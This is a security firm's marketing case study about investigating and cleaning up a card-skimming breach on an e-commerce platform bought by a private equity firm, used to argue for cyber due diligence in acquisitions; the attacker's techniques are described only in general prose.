CASE STUDY

Cyber Diligence: Critical for M&A

by | Apr 7, 2020 | Case Study, TPRM Exposure

The Challenge

A private equity company (the client) focusing on mid-size businesses acquired an e-commerce platform (the portfolio company), and during the post-acquisition period learned of a breach affecting the company’s public-facing application server. An attacker had gained unauthorized access to the underlying operating system, installed malicious code, and was skimming the credit card information of customers performing legitimate transactions.

Why Nisos

Unfortunately the client had not integrated cybersecurity into its diligence process at the time of this acquisition, but it had done so subsequently, and therefore understood we would be able to bring extensive external data and expert analysis to investigate the nature of the breach and assist its portfolio company with remediation.

Preparation

The portfolio company received a notification from their credit card processor that they may have been compromised based on the fact that over 700 credit cards that had been used legitimately on their site, had later experienced fraud. The portfolio company identified one line of code that was silently skimming credit card payments and realized they could not handle detection, hunting, and remediation. They ultimately notified the client. Nisos collected available logs and deployed an endpoint detection and response (EDR) tool for active monitoring.

Execution

We were unable to determine the initial point of compromise due to the length of time the attacker had access and a lack of prior log aggregation but determined the initial compromise occurred three months prior to our involvement.

Further investigative efforts indicated the sophisticated attacker had gained root level access to one of the portfolio company’s primary public-facing e-commerce web servers and backend access to an API and database server, providing the attacker access to usernames, hashed passwords, email addresses, application content, and more.

Initially, the attacker modified the webpage and added additional code that was executed when customers purchased items, sending customer and credit card information to attacker-controlled infrastructure. We identified and removed the attacker’s persistent backdoor.

The attacker quickly realized they had been discovered and desperately tried to maintain persistent access by exploiting a logic flaw in legacy PHP code and downloading additional backdoors. We identified these backdoors using the EDR agent, reported the vulnerable PHP code, and removed all accesses despite repeated attempts to maintain persistence. During the course of our investigation, we discovered that the attacker had previously modified internal source code with a backdoor and posted it to Pastebin. The attacker leveraged Pastebin as a means of transferring malicious code to company servers.

Additional application testing uncovered several critical vulnerabilities that permitted administrative access to the applications. We made additional referrals to external application developers to aid with remediation.

Light attribution indicated the attacker used TOR and two additional VPN services to obfuscate their true location. A lapse in the VPN exposed the attacker’s true IP, which Nisos tracked to an apartment complex in Eastern Europe. Additional analysis of NetFlow data revealed the attacker was targeting other non-related entities as well.

Impact

Over 700 customer credit cards were flagged with fraudulent charges and this event caused significant damage to the brand reputation of the portfolio company. In hindsight, if proper diligence had been completed prior to the acquisition, the client would have known about the breach before closing the acquisition.

In the end, the client’s quick action upon notification of the credit card anomalies likely saved the business. Nisos experts were more than the presumably Eastern European attacker could handle, but not before the portfolio company suffered damage to its reputation and was forced to spend six figures remediating all of the damage the attacker had already done.

About Nisos

Nisos is the Managed Intelligence™ company. Our services enable security, intelligence, and trust and safety teams to leverage a world-class intelligence capability tailored to their needs. We fuse robust data collection with a deep understanding of the adversarial mindset delivering smarter defense and more effective response against advanced cyber attacks, disinformation, and abuse of digital platforms.

For additional information, contact info@nisos.com

Adversary Research
Discovering the methods, motives and identity of threat actors to disrupt attacks 
Reputation Defense
Technical guidance for countering disinformation and slanderous attacks 
Trust & Safety
Intelligence to secure business operations and defend against fraud, abuse and e-crime 
TPRM Exposure
Adversary-centric intelligence to address supplier, M&A and investment risks 
Outside Intel
Research for defending outside the firewall that leverages tier 3 intelligence programs 
Executive Shield
Assessment of threats to key personnel with attribution and PII takedown  
Adversary Insights℠ Retainer
Annual retainers for client-driven inquiries and rapid-response research 
Intelligence Team as a Service
Collaborative engagement providing robust intelligence and tier 3 cyber analysts  
Event-Driven Intel Investigations
Multidimensional security fact-finding that delivers insights into adversary behavior 
On Demand Threat Research
Proactive and preventative investigations that reveal threat actor context and risk correlations 
Investment Zero Touch Diligence℠
Project-based discovery to assess risk for investments, IPO, Mergers and Acquisitions 
TPRM Zero Touch Diligence℠
Subscription assessment of external network hygiene, key personnel, and non-traditional business risks